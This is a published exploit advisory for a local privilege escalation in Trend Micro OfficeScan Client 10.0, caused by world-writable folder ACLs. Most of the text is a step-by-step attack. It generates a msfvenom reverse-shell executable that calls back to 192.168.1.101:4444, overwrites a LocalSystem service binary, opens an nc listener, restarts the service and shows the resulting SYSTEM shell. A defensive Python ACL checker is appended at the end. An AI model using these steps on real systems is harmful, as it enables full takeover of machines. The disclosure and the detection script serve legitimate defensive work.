
Trend Micro OfficeScan Client 10.0 Local Privilege Escalation

Date: 24 May 2023. Reported by: msd0pe. Type: packetstorm. Source: packetstormsecurity.com

Trend Micro OfficeScan Client 10.0 ACL Service LPE Exploit for Local Privilege Escalation

Code
`# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE   
# Date: 2023/05/04   
# Exploit Author: msd0pe   
# Vendor Homepage: https://www.trendmicro.com   
# My Github: https://github.com/msd0pe-1   
  
  
Trend Micro OfficeScan Client:  
Versions <= 10.0 contain incorrect ACLs on the OfficeScan client folder, which allow attackers to escalate privileges to the SYSTEM level through the services. This vulnerability does not require any privileged access.  
  
[1] Verify the folder rights:  
> icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"  
  
C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)  
NT SERVICE\TrustedInstaller:(CI)(IO)(F)  
NT AUTHORITY\SYSTEM:(F)  
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)  
BUILTIN\Administrators:(F)  
BUILTIN\Administrators:(OI)(CI)(IO)(F)  
BUILTIN\Users:(F)  
BUILTIN\Users:(OI)(CI)(IO)(F)  
CREATOR OWNER:(OI)(CI)(IO)(F)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)  
  
[2] Get information about the services:  
> sc qc tmlisten  
  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: tmlisten  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : OfficeScan NT Listener  
DEPENDENCIES : Netman  
: WinMgmt  
SERVICE_START_NAME : LocalSystem  
  
OR  
  
> sc qc ntrtscan  
  
SERVICE_NAME: ntrtscan  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : OfficeScan NT RealTime Scan  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
[3] Generate a reverse shell:  
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe  
  
OR  
  
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe  
  
[4] Upload the reverse shell to C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe  
  
[5] Start listener  
> nc -lvp 4444  
  
[6] Restart the service or reboot the server  
> sc stop tmlisten  
> sc start tmlisten  
  
OR  
  
> sc stop ntrtscan  
> sc start ntrtscan  
  
OR  
  
> shutdown /r  
  
[7] Enjoy !  
192.168.1.102: inverse host lookup failed: Unknown host  
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309  
Microsoft Windows [Version 10.0.19045.2130]  
(c) Microsoft Corporation. All rights reserved.  
  
C:\Windows\system32>whoami  
  
nt authority\system  
  
  
`
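
For defenders, the `icacls` check in step [1] can be automated. The following is an added example, not part of the original advisory: it parses `icacls` output for a service install folder and reports allow-ACEs that give unprivileged principals write-class rights. The function name, the list of low-privileged principals and the "fixed" ACL sample are assumptions of this example.

```python
import re

# Principals treated as unprivileged (assumption of this example; extend per site).
LOW_PRIV = {"builtin\\users", "everyone", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# icacls rights that allow planting, replacing or re-permissioning files.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO", "GA", "GW"}
ACE = re.compile(r"^(?P<who>.+?):(?P<groups>(?:\([^)]*\))+)$")

def risky_aces(path, icacls_output):
    """Return (principal, scope, rights) for allow-ACEs giving low-privileged
    principals write-class access to `path` or to objects created under it."""
    findings = []
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):  # first line is prefixed by the path
            line = line[len(path):].strip()
        m = ACE.match(line)
        if not m or m["who"].lower() not in LOW_PRIV:
            continue
        tokens = {t.strip().upper() for g in re.findall(r"\(([^)]*)\)", m["groups"])
                  for t in g.split(",")}
        rights = tokens & WRITE_RIGHTS
        if rights and "DENY" not in tokens:
            scope = "inherited by children" if "IO" in tokens else "folder itself"
            findings.append((m["who"], scope, sorted(rights)))
    return findings

PATH = r"C:\Program Files (x86)\Trend Micro\OfficeScan Client"
# Constructed sample: SYSTEM, Administrators and BUILTIN\Users lines as in step [1].
WEAK = r"""C:\Program Files (x86)\Trend Micro\OfficeScan Client NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
"""
# Constructed sample of a corrected ACL: Users limited to read and execute.
FIXED = r"""C:\Program Files (x86)\Trend Micro\OfficeScan Client NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(RX)
"""

if __name__ == "__main__":
    for who, scope, rights in risky_aces(PATH, WEAK):
        print(f"WEAK ACL: {who} has {','.join(rights)} on {scope}")
    print("fixed ACL findings:", risky_aces(PATH, FIXED))
```

Run it against the folder of every service whose `SERVICE_START_NAME` is `LocalSystem`, using the directory from `BINARY_PATH_NAME` as `path`; any finding means a standard user can replace the service binary.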
